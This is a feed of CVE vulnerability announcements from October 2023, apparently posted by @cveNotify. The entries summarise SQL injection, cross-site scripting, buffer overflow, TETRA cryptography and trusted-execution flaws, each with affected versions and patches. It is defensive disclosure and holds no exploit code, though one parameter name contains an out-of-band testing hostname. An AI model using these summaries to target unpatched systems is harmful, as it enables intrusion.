🚨 CVE-2015-10060A vulnerability was found in MNBikeways database and classified as critical. This issue affects some unknown processing of the file Data/views.py. The manipulation of the argument id1/id2 leads to sql injection. The identifier of the patch is 829a027aca7c17f5a7ec1addca8dd5d5542f86ac. It is recommended to apply a patch to fix this issue. The identifier VDB-218417 was assigned to this vulnerability.🎖@cveNotify |
|
| 2023-10-20 10:52:03 |
🚨 CVE-2015-10057A vulnerability was found in Little Apps Little Software Stats. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file inc/class.securelogin.php of the component Password Reset Handler. The manipulation leads to improper access controls. The complexity of an attack is rather high. The exploitation appears to be difficult. Upgrading to version 0.2 is able to address this issue. The identifier of the patch is 07ba8273a9311d1383f3686ac7cb32f20770ab1e. It is recommended to upgrade the affected component. The identifier VDB-218401 was assigned to this vulnerability.🎖@cveNotify |
|
| 2023-10-20 10:52:02 |
🚨 CVE-2015-10054A vulnerability, which was classified as critical, was found in githuis P2Manage. This affects the function Execute of the file PTwoManage/Database.cs. The manipulation of the argument sql leads to sql injection. The identifier of the patch is 717380aba80002414f82d93c770035198b7858cc. It is recommended to apply a patch to fix this issue. The identifier VDB-218397 was assigned to this vulnerability.🎖@cveNotify |
|
| 2023-10-20 10:52:01 |
🚨 CVE-2015-10055A vulnerability was found in PictureThisWebServer and classified as critical. This issue affects the function router.post of the file routes/user.js. The manipulation of the argument username/password leads to sql injection. The patch is named 68b9dc346e88b494df00d88c7d058e96820e1479. It is recommended to apply a patch to fix this issue. The associated identifier of this vulnerability is VDB-218399.🎖@cveNotify |
|
| 2023-10-20 10:51:59 |
🚨 CVE-2015-10053A vulnerability classified as critical has been found in prodigasistemas curupira up to 0.1.3. Affected is an unknown function of the file app/controllers/curupira/passwords_controller.rb. The manipulation leads to sql injection. Upgrading to version 0.1.4 is able to address this issue. The patch is identified as 93a9a77896bb66c949acb8e64bceafc74bc8c271. It is recommended to upgrade the affected component. VDB-218394 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-10-20 10:51:58 |
🚨 CVE-2015-10052** UNSUPPPORTED WHEN ASSIGNED ** ** UNSUPPORTED WHEN ASSIGNED ** A vulnerability, which was classified as problematic, was found in calesanz gibb-modul-151. This affects the function bearbeiten/login. The manipulation leads to open redirect. It is possible to initiate the attack remotely. The patch is named 88a517dc19443081210c804b655e72770727540d. It is recommended to apply a patch to fix this issue. The associated identifier of this vulnerability is VDB-218379. NOTE: This vulnerability only affects products that are no longer supported by the maintainer.🎖@cveNotify |
|
| 2023-10-20 10:51:57 |
🚨 CVE-2015-10050A vulnerability was found in brandonfire miRNA_Database_by_PHP_MySql. It has been declared as critical. This vulnerability affects the function __construct/select_single_rna/count_rna of the file inc/model.php. The manipulation leads to sql injection. The patch is identified as 307c5d510841e6142ddcbbdbb93d0e8a0dc3fd6a. It is recommended to apply a patch to fix this issue. VDB-218374 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-10-20 00:52:21 |
🚨 CVE-2023-41896Home assistant is an open source home automation. Whilst auditing the frontend code to identify hidden parameters, Cure53 detected `auth_callback=1`, which is leveraged by the WebSocket authentication logic in tandem with the `state` parameter. The state parameter contains the `hassUrl`, which is subsequently utilized to establish a WebSocket connection. This behavior permits an attacker to create a malicious Home Assistant link with a modified state parameter that forces the frontend to connect to an alternative WebSocket backend. Henceforth, the attacker can spoof any WebSocket responses and trigger cross site scripting (XSS). Since the XSS is executed on the actual Home Assistant frontend domain, it can connect to the real Home Assistant backend, which essentially represents a comprehensive takeover scenario. Permitting the site to be iframed by other origins, as discussed in GHSA-935v-rmg9-44mw, renders this exploit substantially covert since a malicious website can obfuscate the compromise strategy in the background. However, even without this, the attacker can still send the `auth_callback` link directly to the victim user. To mitigate this issue, Cure53 advises modifying the WebSocket code’s authentication flow. An optimal implementation in this regard would not trust the `hassUrl` passed in by a GET parameter. Cure53 must stipulate the significant time required of the Cure53 consultants to identify an XSS vector, despite holding full control over the WebSocket responses. In many areas, data from the WebSocket was properly sanitized, which hinders post-exploitation. The audit team eventually detected the `js_url` for custom panels, though generally, the frontend exhibited reasonable security hardening. This issue has been addressed in Home Assistant Core version 2023.8.0 and in the npm package home-assistant-js-websocket in version 8.2.0. Users are advised to upgrade. There are no known workarounds for this vulnerability.🎖@cveNotify |
|
| 2023-10-20 00:52:19 |
🚨 CVE-2023-41897Home assistant is an open source home automation. Home Assistant server does not set any HTTP security headers, including the X-Frame-Options header, which specifies whether the web page is allowed to be framed. The omission of this and correlating headers facilitates covert clickjacking attacks and alternative exploit opportunities, such as the vector described in this security advisory. This fault incurs major risk, considering the ability to trick users into installing an external and malicious add-on with minimal user interaction, which would enable Remote Code Execution (RCE) within the Home Assistant application. This issue has been addressed in version 2023.9.0 and all users are advised to upgrade. There are no known workarounds for this vulnerability.🎖@cveNotify |
|
| 2023-10-20 00:52:18 |
🚨 CVE-2023-41898Home assistant is an open source home automation. The Home Assistant Companion for Android app up to version 2023.8.2 is vulnerable to arbitrary URL loading in a WebView. This enables all sorts of attacks, including arbitrary JavaScript execution, limited native code execution, and credential theft. This issue has been patched in version 2023.9.2 and all users are advised to upgrade. There are no known workarounds for this vulnerability. This issue is also tracked as GitHub Security Lab (GHSL) Vulnerability Report: `GHSL-2023-142`.🎖@cveNotify |
|
| 2023-10-20 00:52:17 |
🚨 CVE-2023-41899Home assistant is an open source home automation. In affected versions the `hassio.addon_stdin` is vulnerable to a partial Server-Side Request Forgery where an attacker capable of calling this service (e.g.: through GHSA-h2jp-7grc-9xpp) may be able to invoke any Supervisor REST API endpoints with a POST request. An attacker able to exploit will be able to control the data dictionary, including its addon and input key/values. This issue has been addressed in version 2023.9.0 and all users are advised to upgrade. There are no known workarounds for this vulnerability. This issue is also tracked as GitHub Security Lab (GHSL) Vulnerability Report: `GHSL-2023-162`.🎖@cveNotify |
|
| 2023-10-20 00:52:16 |
🚨 CVE-2023-43340Cross-site scripting (XSS) vulnerability in evolution v.3.2.3 allows a local attacker to execute arbitrary code via a crafted payload injected into the cmsadmin, cmsadminemail, cmspassword and cmspasswordconfim parameters🎖@cveNotify |
|
| 2023-10-20 00:52:14 |
🚨 CVE-2023-43345Cross-site scripting (XSS) vulnerability in opensolution Quick CMS v.6.7 allows a local attacker to execute arbitrary code via a crafted script to the Content - Name parameter in the Pages Menu component.🎖@cveNotify |
|
| 2023-10-20 00:52:13 |
🚨 CVE-2023-44385The Home Assistant Companion for iOS and macOS app up to version 2023.4 are vulnerable to Client-Side Request Forgery. Attackers may send malicious links/QRs to victims that, when visited, will make the victim to call arbitrary services in their Home Assistant installation. Combined with this security advisory, may result in full compromise and remote code execution (RCE). Version 2023.7 addresses this issue and all users are advised to upgrade. There are no known workarounds for this vulnerability. This issue is also tracked as GitHub Security Lab (GHSL) Vulnerability Report: GHSL-2023-161.🎖@cveNotify |
|
| 2023-10-20 00:52:11 |
🚨 CVE-2023-43341Cross-site scripting (XSS) vulnerability in evolution evo v.3.2.3 allows a local attacker to execute arbitrary code via a crafted payload injected uid parameter.🎖@cveNotify |
|
| 2023-10-20 00:52:10 |
🚨 CVE-2023-43342Cross-site scripting (XSS) vulnerability in opensolution Quick CMS v.6.7 allows a local attacker to execute arbitrary code via a crafted script to the Languages Menu component.🎖@cveNotify |
|
| 2023-10-20 00:52:09 |
🚨 CVE-2023-43344Cross-site scripting (XSS) vulnerability in opensolution Quick CMS v.6.7 allows a local attacker to execute arbitrary code via a crafted script to the SEO - Meta description parameter in the Pages Menu component.🎖@cveNotify |
|
| 2023-10-20 00:52:07 |
🚨 CVE-2023-43359Cross Site Scripting vulnerability in CMSmadesimple v.2.2.18 allows a local attacker to execute arbitrary code via a crafted script to the Page Specific Metadata and Smarty data parameters in the Content Manager Menu component.🎖@cveNotify |
|
| 2023-10-20 00:52:06 |
🚨 CVE-2023-43875Multiple Cross-Site Scripting (XSS) vulnerabilities in installation of Subrion CMS v.4.2.1 allows a local attacker to execute arbitrary web scripts via a crafted payload injected into the dbhost, dbname, dbuser, adminusername and adminemail.🎖@cveNotify |
|
| 2023-10-20 00:52:05 |
🚨 CVE-2023-44690Inadequate encryption strength in mycli 1.27.0 allows attackers to view sensitive information via /mycli/config.py🎖@cveNotify |
|
| 2023-10-20 00:52:04 |
🚨 CVE-2023-45279Yamcs 5.8.6 allows XSS (issue 1 of 2). It comes with a Bucket as its primary storage mechanism. Buckets allow for the upload of any file. There's a way to upload a display referencing a malicious JavaScript file to the bucket. The user can then open the uploaded display by selecting Telemetry from the menu and navigating to the display.🎖@cveNotify |
|
| 2023-10-20 00:52:02 |
🚨 CVE-2023-45280Yamcs 5.8.6 allows XSS (issue 2 of 2). It comes with a Bucket as its primary storage mechanism. Buckets allow for the upload of any file. There's a way to upload an HTML file containing arbitrary JavaScript and then navigate to it. Once the user opens the file, the browser will execute the arbitrary JavaScript.🎖@cveNotify |
|
| 2023-10-20 00:52:01 |
🚨 CVE-2023-45815ArchiveBox is an open source self-hosted web archiving system. Any users who are using the `wget` extractor and view the content it outputs. The impact is potentially severe if you are logged in to the ArchiveBox admin site in the same browser session and view an archived malicious page designed to target your ArchiveBox instance. Malicious Javascript could potentially act using your logged-in admin credentials and add/remove/modify snapshots, add/remove/modify ArchiveBox users, and generally do anything an admin user could do. The impact is less severe for non-logged-in users, as malicious Javascript cannot *modify* any archives, but it can still *read* all the other archived content by fetching the snapshot index and iterating through it. Because all of ArchiveBox's archived content is served from the same host and port as the admin panel, when archived pages are viewed the JS executes in the same context as all the other archived pages (and the admin panel), defeating most of the browser's usual CORS/CSRF security protections and leading to this issue. A patch is being developed in https://github.com/ArchiveBox/ArchiveBox/issues/239. As a mitigation for this issue would be to disable the wget extractor by setting `archivebox config --set SAVE_WGET=False`, ensure you are always logged out, or serve only a [static HTML version](https://github.com/ArchiveBox/ArchiveBox/wiki/Publishing-Your-Archive#2-export-and-host-it-as-static-html) of your archive.🎖@cveNotify |
|
| 2023-10-20 00:52:00 |
🚨 CVE-2023-45818TinyMCE is an open source rich text editor. A mutation cross-site scripting (mXSS) vulnerability was discovered in TinyMCE’s core undo and redo functionality. When a carefully-crafted HTML snippet passes the XSS sanitisation layer, it is manipulated as a string by internal trimming functions before being stored in the undo stack. If the HTML snippet is restored from the undo stack, the combination of the string manipulation and reparative parsing by either the browser's native [DOMParser API](https://developer.mozilla.org/en-US/docs/Web/API/DOMParser) (TinyMCE 6) or the SaxParser API (TinyMCE 5) mutates the HTML maliciously, allowing an XSS payload to be executed. This vulnerability has been patched in TinyMCE 5.10.8 and TinyMCE 6.7.1 by ensuring HTML is trimmed using node-level manipulation instead of string manipulation. Users are advised to upgrade. There are no known workarounds for this vulnerability.🎖@cveNotify |
|
| 2023-10-20 00:51:59 |
🚨 CVE-2023-45819TinyMCE is an open source rich text editor. A cross-site scripting (XSS) vulnerability was discovered in TinyMCE’s Notification Manager API. The vulnerability exploits TinyMCE's unfiltered notification system, which is used in error handling. The conditions for this exploit requires carefully crafted malicious content to have been inserted into the editor and a notification to have been triggered. When a notification was opened, the HTML within the text argument was displayed unfiltered in the notification. The vulnerability allowed arbitrary JavaScript execution when an notification presented in the TinyMCE UI for the current user. This issue could also be exploited by any integration which uses a TinyMCE notification to display unfiltered HTML content. This vulnerability has been patched in TinyMCE 5.10.8 and TinyMCE 6.7.1 by ensuring that the HTML displayed in the notification is sanitized, preventing the exploit. Users are advised to upgrade. There are no known workarounds for this vulnerability.🎖@cveNotify |
|
| 2023-10-20 00:51:58 |
🚨 CVE-2023-45573Buffer Overflow vulnerability in D-Link device DI-7003GV2.D1 v.23.08.25D1 and before, DI-7100G+V2.D1 v.23.08.23D1 and before, DI-7100GV2.D1 v.23.08.23D1, DI-7200G+V2.D1 v.23.08.23D1 and before, DI-7200GV2.E1 v.23.08.23E1 and before, DI-7300G+V2.D1 v.23.08.23D1, and DI-7400G+V2.D1 v.23.08.23D1 and before allows a remote attacker to execute arbitrary code via the n parameter of the mrclfile_del.asp function.🎖@cveNotify |
|
| 2023-10-20 00:51:57 |
🚨 CVE-2023-45580Buffer Overflow vulnerability in D-Link device DI-7003GV2.D1 v.23.08.25D1 and before, DI-7100G+V2.D1 v.23.08.23D1 and before, DI-7100GV2.D1 v.23.08.23D1, DI-7200G+V2.D1 v.23.08.23D1 and before, DI-7200GV2.E1 v.23.08.23E1 and before, DI-7300G+V2.D1 v.23.08.23D1, and DI-7400G+V2.D1 v.23.08.23D1 and before allows a remote attacker to execute arbitrary code via the wild/mx and other parameters of the ddns.asp function🎖@cveNotify |
|
| 2023-10-19 22:22:18 |
🚨 CVE-2021-36054XMP Toolkit SDK version 2020.1 (and earlier) is affected by a buffer overflow vulnerability potentially resulting in local application denial of service in the context of the current user. Exploitation requires user interaction in that a victim must open a crafted file.🎖@cveNotify |
|
| 2023-10-19 22:22:17 |
🚨 CVE-2021-36055XMP Toolkit SDK versions 2020.1 (and earlier) are affected by a use-after-free vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.🎖@cveNotify |
|
| 2023-10-19 22:22:16 |
🚨 CVE-2021-36052XMP Toolkit version 2020.1 (and earlier) is affected by a memory corruption vulnerability, potentially resulting in arbitrary code execution in the context of the current user. User interaction is required to exploit this vulnerability.🎖@cveNotify |
|
| 2023-10-19 22:22:15 |
🚨 CVE-2021-36053XMP Toolkit SDK versions 2020.1 (and earlier) are affected by an out-of-bounds read vulnerability that could lead to disclosure of arbitrary memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious file.🎖@cveNotify |
|
| 2023-10-19 22:22:13 |
🚨 CVE-2021-36050XMP Toolkit SDK version 2020.1 (and earlier) is affected by a buffer overflow vulnerability potentially resulting in arbitrary code execution in the context of the current user. Exploitation requires user interaction in that a victim must open a crafted file.🎖@cveNotify |
|
| 2023-10-19 22:22:12 |
🚨 CVE-2021-36045XMP Toolkit SDK versions 2020.1 (and earlier) are affected by an out-of-bounds read vulnerability that could lead to disclosure of arbitrary memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious file.🎖@cveNotify |
|
| 2023-10-19 22:22:10 |
🚨 CVE-2023-4800The DoLogin Security WordPress plugin before 3.7.1 does not restrict the access of a widget that shows the IPs of failed logins to low privileged users.🎖@cveNotify |
|
| 2023-10-19 22:22:09 |
🚨 CVE-2021-36048XMP Toolkit SDK version 2020.1 (and earlier) is affected by an Improper Input Validation vulnerability potentially resulting in arbitrary code execution in the context of the current user. Exploitation requires user interaction in that a victim must open a crafted file.🎖@cveNotify |
|
| 2023-10-19 22:22:07 |
🚨 CVE-2021-36047XMP Toolkit SDK version 2020.1 (and earlier) is affected by an Improper Input Validation vulnerability potentially resulting in arbitrary code execution in the context of the current user. Exploitation requires user interaction in that a victim must open a crafted file.🎖@cveNotify |
|
| 2023-10-19 22:22:06 |
🚨 CVE-2021-36046XMP Toolkit version 2020.1 (and earlier) is affected by a memory corruption vulnerability, potentially resulting in arbitrary code execution in the context of the current user. User interaction is required to exploit this vulnerability.🎖@cveNotify |
|
| 2023-10-19 22:22:05 |
🚨 CVE-2023-4795The Testimonial Slider Shortcode WordPress plugin before 1.1.9 does not validate and escape some of its shortcode attributes before outputting them back in the page, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attacks which could be used against high privilege users such as admin🎖@cveNotify |
|
| 2023-10-19 22:22:04 |
🚨 CVE-2023-4783The Magee Shortcodes WordPress plugin through 2.1.1 does not validate and escape some of its shortcode attributes before outputting them back in a page/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.🎖@cveNotify |
|
| 2023-10-19 22:22:03 |
🚨 CVE-2023-4776The School Management System WordPress plugin before 2.2.5 uses the WordPress esc_sql() function on a field not delimited by quotes and did not first prepare the query, leading to a SQL injection exploitable by relatively low-privilege users like Teachers.🎖@cveNotify |
|
| 2023-10-19 22:22:02 |
🚨 CVE-2023-43724Os Commerce is currently susceptible to a Cross-Site Scripting (XSS) vulnerability.This vulnerability allows attackers to inject JS through the "derb6zmklgtjuhh2cn5chn2qjbm2stgmfa4.oastify.comscription[1][name]" parameter,potentially leading to unauthorized execution of scripts within a user's web browser.🎖@cveNotify |
|
| 2023-10-19 22:22:01 |
🚨 CVE-2023-43725Os Commerce is currently susceptible to a Cross-Site Scripting (XSS) vulnerability.This vulnerability allows attackers to inject JS through the "orders_products_status_name_long[1]" parameter,potentially leading to unauthorized execution of scripts within a user's web browser.🎖@cveNotify |
|
| 2023-10-19 22:21:59 |
🚨 CVE-2023-43726Os Commerce is currently susceptible to a Cross-Site Scripting (XSS) vulnerability.This vulnerability allows attackers to inject JS through the "orders_products_status_manual_name_long[1]" parameter,potentially leading to unauthorized execution of scripts within a user's web browser.🎖@cveNotify |
|
| 2023-10-19 22:21:58 |
🚨 CVE-2023-43727Os Commerce is currently susceptible to a Cross-Site Scripting (XSS) vulnerability.This vulnerability allows attackers to inject JS through the "stock_indication_text[1]" parameter,potentially leading to unauthorized execution of scripts within a user's web browser.🎖@cveNotify |
|
| 2023-10-19 22:21:57 |
🚨 CVE-2023-43728Os Commerce is currently susceptible to a Cross-Site Scripting (XSS) vulnerability.This vulnerability allows attackers to inject JS through the "stock_delivery_terms_text[1]" parameter,potentially leading to unauthorized execution of scripts within a user's web browser.🎖@cveNotify |
|
| 2023-10-19 22:21:56 |
🚨 CVE-2023-43729Os Commerce is currently susceptible to a Cross-Site Scripting (XSS) vulnerability.This vulnerability allows attackers to inject JS through the "xsell_type_name[1]" parameter,potentially leading to unauthorized execution of scripts within a user's web browser.🎖@cveNotify |
|
| 2023-10-19 14:52:37 |
🚨 CVE-2023-45883A privilege escalation vulnerability exists within the Qumu Multicast Extension v2 before 2.0.63 for Windows. When a standard user triggers a repair of the software, a pop-up window opens with SYSTEM privileges. Standard users may use this to gain arbitrary code execution as SYSTEM.🎖@cveNotify |
|
| 2023-10-19 14:52:35 |
🚨 CVE-2023-21415Sandro Poppi, member of the AXIS OS Bug Bounty Program, has found that the VAPIX API overlay_del.cgi is vulnerable to path traversal attacks that allows for file deletion. This flaw can only be exploited after authenticating with an operator- or administrator-privileged service account. Axis has released patched AXIS OS versions for the highlighted flaw. Please refer to the Axis security advisory for more information and solution.🎖@cveNotify |
|
| 2023-10-19 14:52:33 |
🚨 CVE-2023-45160In the affected version of the 1E Client, an ordinary user could subvert downloaded instruction resource files, e.g., to substitute a harmful script. by replacing a resource script file created by an instruction at run time with a malicious script. The 1E Client's temporary directory is now locked down in the released patch.Resolution: This has been fixed in patch Q23094🎖@cveNotify |
|
| 2023-10-19 14:52:30 |
🚨 CVE-2023-451591E Client installer can perform arbitrary file deletion on protected files. A non-privileged user could provide a symbolic link or Windows junction to point to a protected directory in the installer that the 1E Client would then clear on service startup. A hotfix is available from the 1E support portal that forces the 1E Client to check for a symbolic link or junction and if it finds one refuses to use that path and instead creates a path involving a random GUID.for v8.1 use hotfix Q23097for v8.4 use hotfix Q23105for v9.0 use hotfix Q23115for SaaS customers, use 1EClient v23.7 plus hotfix Q23121🎖@cveNotify |
|
| 2023-10-19 14:52:27 |
🚨 CVE-2023-45871An issue was discovered in drivers/net/ethernet/intel/igb/igb_main.c in the IGB driver in the Linux kernel before 6.5.3. A buffer size may not be adequate for frames larger than the MTU.🎖@cveNotify |
|
| 2023-10-19 14:52:23 |
🚨 CVE-2023-45863An issue was discovered in lib/kobject.c in the Linux kernel before 6.2.3. With root access, an attacker can trigger a race condition that results in a fill_kobj_path out-of-bounds write.🎖@cveNotify |
|
| 2023-10-19 14:52:21 |
🚨 CVE-2023-45984TOTOLINK X5000R V9.1.0u.6118_B20201102 and TOTOLINK A7000R V9.1.0u.6115_B20201022 was discovered to contain a stack overflow via the lang parameter in the function setLanguageCfg.🎖@cveNotify |
|
| 2023-10-19 14:52:19 |
🚨 CVE-2023-45985TOTOLINK X5000R V9.1.0u.6118_B20201102 and TOTOLINK A7000R V9.1.0u.6115_B20201022 were discovered to contain a stack overflow in the function setParentalRules. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted POST request.🎖@cveNotify |
|
| 2023-10-19 14:52:15 |
🚨 CVE-2022-24400A flaw in the TETRA authentication procecure allows a MITM adversary that can predict the MS challenge RAND2 to set session key DCK to zero.🎖@cveNotify |
|
| 2023-10-19 14:52:14 |
🚨 CVE-2022-24401Adversary-induced keystream re-use on TETRA air-interface encrypted traffic using any TEA keystream generator. IV generation is based upon several TDMA frame counters, which are frequently broadcast by the infrastructure in an unauthenticated manner. An active adversary can manipulate the view of these counters in a mobile station, provoking keystream re-use. By sending crafted messages to the MS and analyzing MS responses, keystream for arbitrary frames can be recovered.🎖@cveNotify |
|
| 2023-10-19 14:52:13 |
🚨 CVE-2022-24402The TETRA TEA1 keystream generator implements a key register initialization function that compresses the 80-bit key to only 32 bits for usage during the keystream generation phase, which is insufficient to safeguard against exhaustive search attacks.🎖@cveNotify |
|
| 2023-10-19 14:52:11 |
🚨 CVE-2022-24404Lack of cryptographic integrity check on TETRA air-interface encrypted traffic. Since a stream cipher is employed, this allows an active adversary to manipulate cleartext data in a bit-by-bit fashion.🎖@cveNotify |
|
| 2023-10-19 14:52:09 |
🚨 CVE-2022-25332The AES implementation in the Texas Instruments OMAP L138 (secure variants), present in mask ROM, suffers from a timing side channel which can be exploited by an adversary with non-secure supervisor privileges by managing cache contents and collecting timing information for different ciphertext inputs. Using this side channel, the SK_LOAD secure kernel routine can be used to recover the Customer Encryption Key (CEK).🎖@cveNotify |
|
| 2023-10-19 14:52:08 |
🚨 CVE-2022-25333The Texas Instruments OMAP L138 (secure variants) trusted execution environment (TEE) performs an RSA check implemented in mask ROM when loading a module through the SK_LOAD routine. However, only the module header authenticity is validated. An adversary can re-use any correctly signed header and append a forged payload, to be encrypted using the CEK (obtainable through CVE-2022-25332) in order to obtain arbitrary code execution in secure context. This constitutes a full break of the TEE security architecture.🎖@cveNotify |
|
| 2023-10-19 13:22:27 |
🚨 CVE-2023-36947TOTOLINK X5000R V9.1.0u.6118_B20201102 and TOTOLINK A7000R V9.1.0u.6115_B20201022 was discovered to contain a stack overflow via the File parameter in the function UploadCustomModule.🎖@cveNotify |
|
| 2023-10-19 13:22:25 |
🚨 CVE-2023-36952TOTOLINK CP300+ V5.2cu.7594_B20200910 was discovered to contain a stack overflow via the pingIp parameter in the function setDiagnosisCfg.🎖@cveNotify |
|
| 2023-10-19 13:22:24 |
🚨 CVE-2023-36953TOTOLINK CP300+ V5.2cu.7594_B20200910 and before is vulnerable to command injection.🎖@cveNotify |
|
| 2023-10-19 13:22:23 |
🚨 CVE-2023-36950TOTOLINK X5000R V9.1.0u.6118_B20201102 and TOTOLINK A7000R V9.1.0u.6115_B20201022 was discovered to contain a stack overflow via the http_host parameter in the function loginAuth.🎖@cveNotify |
|
| 2023-10-19 13:22:21 |
🚨 CVE-2023-36954TOTOLINK CP300+ V5.2cu.7594_B20200910 and before is vulnerable to command injection.🎖@cveNotify |
|
| 2023-10-19 13:22:20 |
🚨 CVE-2023-5591SQL Injection in GitHub repository librenms/librenms prior to 23.10.0.🎖@cveNotify |
|
| 2023-10-19 13:22:19 |
🚨 CVE-2023-5590NULL Pointer Dereference in GitHub repository seleniumhq/selenium prior to 4.14.0.🎖@cveNotify |
|
| 2023-10-19 13:22:18 |
🚨 CVE-2023-45862An issue was discovered in drivers/usb/storage/ene_ub6250.c for the ENE UB6250 reader driver in the Linux kernel before 6.2.5. An object could potentially extend beyond the end of an allocation.🎖@cveNotify |
|
| 2023-10-19 13:22:17 |
🚨 CVE-2022-24400A flaw in the TETRA authentication procecure allows a MITM adversary that can predict the MS challenge RAND2 to set session key DCK to zero.🎖@cveNotify |
|
| 2023-10-19 13:22:16 |
🚨 CVE-2022-24401Adversary-induced keystream re-use on TETRA air-interface encrypted traffic using any TEA keystream generator. IV generation is based upon several TDMA frame counters, which are frequently broadcast by the infrastructure in an unauthenticated manner. An active adversary can manipulate the view of these counters in a mobile station, provoking keystream re-use. By sending crafted messages to the MS and analyzing MS responses, keystream for arbitrary frames can be recovered.🎖@cveNotify |
|
| 2023-10-19 13:22:15 |
🚨 CVE-2022-24402The TETRA TEA1 keystream generator implements a key register initialization function that compresses the 80-bit key to only 32 bits for usage during the keystream generation phase, which is insufficient to safeguard against exhaustive search attacks.🎖@cveNotify |
|
| 2023-10-19 13:22:14 |
🚨 CVE-2022-24404Lack of cryptographic integrity check on TETRA air-interface encrypted traffic. Since a stream cipher is employed, this allows an active adversary to manipulate cleartext data in a bit-by-bit fashion.🎖@cveNotify |
|
| 2023-10-19 13:22:12 |
🚨 CVE-2022-25332The AES implementation in the Texas Instruments OMAP L138 (secure variants), present in mask ROM, suffers from a timing side channel which can be exploited by an adversary with non-secure supervisor privileges by managing cache contents and collecting timing information for different ciphertext inputs. Using this side channel, the SK_LOAD secure kernel routine can be used to recover the Customer Encryption Key (CEK).🎖@cveNotify |
|
| 2023-10-19 13:22:11 |
🚨 CVE-2022-25333The Texas Instruments OMAP L138 (secure variants) trusted execution environment (TEE) performs an RSA check implemented in mask ROM when loading a module through the SK_LOAD routine. However, only the module header authenticity is validated. An adversary can re-use any correctly signed header and append a forged payload, to be encrypted using the CEK (obtainable through CVE-2022-25332) in order to obtain arbitrary code execution in secure context. This constitutes a full break of the TEE security architecture.🎖@cveNotify |
|
| 2023-10-19 13:22:10 |
🚨 CVE-2022-25334The Texas Instruments OMAP L138 (secure variants) trusted execution environment (TEE) lacks a bounds check on the signature size field in the SK_LOAD module loading routine, present in mask ROM. A module with a sufficiently large signature field causes a stack overflow, affecting secure kernel data pages. This can be leveraged to obtain arbitrary code execution in secure supervisor context by overwriting a SHA256 function pointer in the secure kernel data area when loading a forged, unsigned SK_LOAD module encrypted with the CEK (obtainable through CVE-2022-25332). This constitutes a full break of the TEE security architecture.🎖@cveNotify |
|
| 2023-10-19 13:22:09 |
🚨 CVE-2022-26941A format string vulnerability exists in Motorola MTM5000 series firmware AT command handler for the AT+CTGL command. An attacker-controllable string is improperly handled, allowing for a write-anything-anywhere scenario. This can be leveraged to obtain arbitrary code execution inside the teds_app binary, which runs with root privileges.🎖@cveNotify |
|
| 2023-10-19 13:22:08 |
🚨 CVE-2022-26942The Motorola MTM5000 series firmwares lack pointer validation on arguments passed to trusted execution environment (TEE) modules. Two modules are used, one responsible for KVL key management and the other for TETRA cryptographic functionality. In both modules, an adversary with non-secure supervisor level code execution can exploit the issue in order to gain secure supervisor code execution within the TEE. This constitutes a full break of the TEE module, exposing the device key as well as any TETRA cryptographic keys and the confidential TETRA cryptographic primitives.🎖@cveNotify |
|
| 2023-10-19 13:22:07 |
🚨 CVE-2022-26943The Motorola MTM5000 series firmwares generate TETRA authentication challenges using a PRNG using a tick count register as its sole entropy source. Low boottime entropy and limited re-seeding of the pool renders the authentication challenge vulnerable to two attacks. First, due to the limited boottime pool entropy, an adversary can derive the contents of the entropy pool by an exhaustive search of possible values, based on an observed authentication challenge. Second, an adversary can use knowledge of the entropy pool to predict authentication challenges. As such, the unit is vulnerable to CVE-2022-24400.🎖@cveNotify |
|
| 2023-10-19 13:22:04 |
🚨 CVE-2023-46227Deserialization of Untrusted Data Vulnerability in Apache Software Foundation Apache InLong.This issue affects Apache InLong: from 1.4.0 through 1.8.0, the attacker can use \t to bypass. Users are advised to upgrade to Apache InLong's 1.9.0 or cherry-pick [1] to solve it.[1] https://github.com/apache/inlong/pull/8814🎖@cveNotify |
|
| 2023-10-19 05:52:27 |
🚨 CVE-2023-43714Os Commerce is currently susceptible to a Cross-Site Scripting (XSS) vulnerability.This vulnerability allows attackers to inject JS through the "SKIP_CART_PAGE_TITLE[1]" parameter,potentially leading to unauthorized execution of scripts within a user's web browser.🎖@cveNotify |
|
| 2023-10-19 05:52:26 |
🚨 CVE-2023-43713Os Commerce is currently susceptible to a Cross-Site Scripting (XSS) vulnerability,which allows attackers to inject JS via the "title" parameter, in the "/admin/admin-menu/add-submit"endpoint, which can lead to unauthorized execution of scripts in a user's web browser.🎖@cveNotify |
|
| 2023-10-19 05:52:25 |
🚨 CVE-2023-43712Os Commerce is currently susceptible to a Cross-Site Scripting (XSS) vulnerability.This vulnerability allows attackers to inject JS through the "access_levels_name" parameter,potentially leading to unauthorized execution of scripts within a user's web browser.🎖@cveNotify |
|
| 2023-10-19 05:52:24 |
🚨 CVE-2023-43711Os Commerce is currently susceptible to a Cross-Site Scripting (XSS) vulnerability.This vulnerability allows attackers to inject JS through the "admin_firstname" parameter,potentially leading to unauthorized execution of scripts within a user's web browser.🎖@cveNotify |
|
| 2023-10-19 05:52:23 |
🚨 CVE-2023-43709Os Commerce is currently susceptible to a Cross-Site Scripting (XSS) vulnerability.This vulnerability allows attackers to inject JS through the "configuration_title[1](MODULE)" parameter,potentially leading to unauthorized execution of scripts within a user's web browser.🎖@cveNotify |
|
| 2023-10-19 05:52:22 |
🚨 CVE-2023-43710Os Commerce is currently susceptible to a Cross-Site Scripting (XSS) vulnerability.This vulnerability allows attackers to inject JS through the "configuration_title[1][MODULE_SHIPPING_PERCENT_TEXT_TITLE]" parameter,potentially leading to unauthorized execution of scripts within a user's web browser.🎖@cveNotify |
|
| 2023-10-19 05:52:21 |
🚨 CVE-2023-43708Os Commerce is currently susceptible to a Cross-Site Scripting (XSS) vulnerability.This vulnerability allows attackers to inject JS through the "configuration_title[1](MODULE_PAYMENT_SAGE_PAY_SERVER_TEXT_TITLE)" parameter,potentially leading to unauthorized execution of scripts within a user's web browser.🎖@cveNotify |
|
| 2023-10-19 05:52:20 |
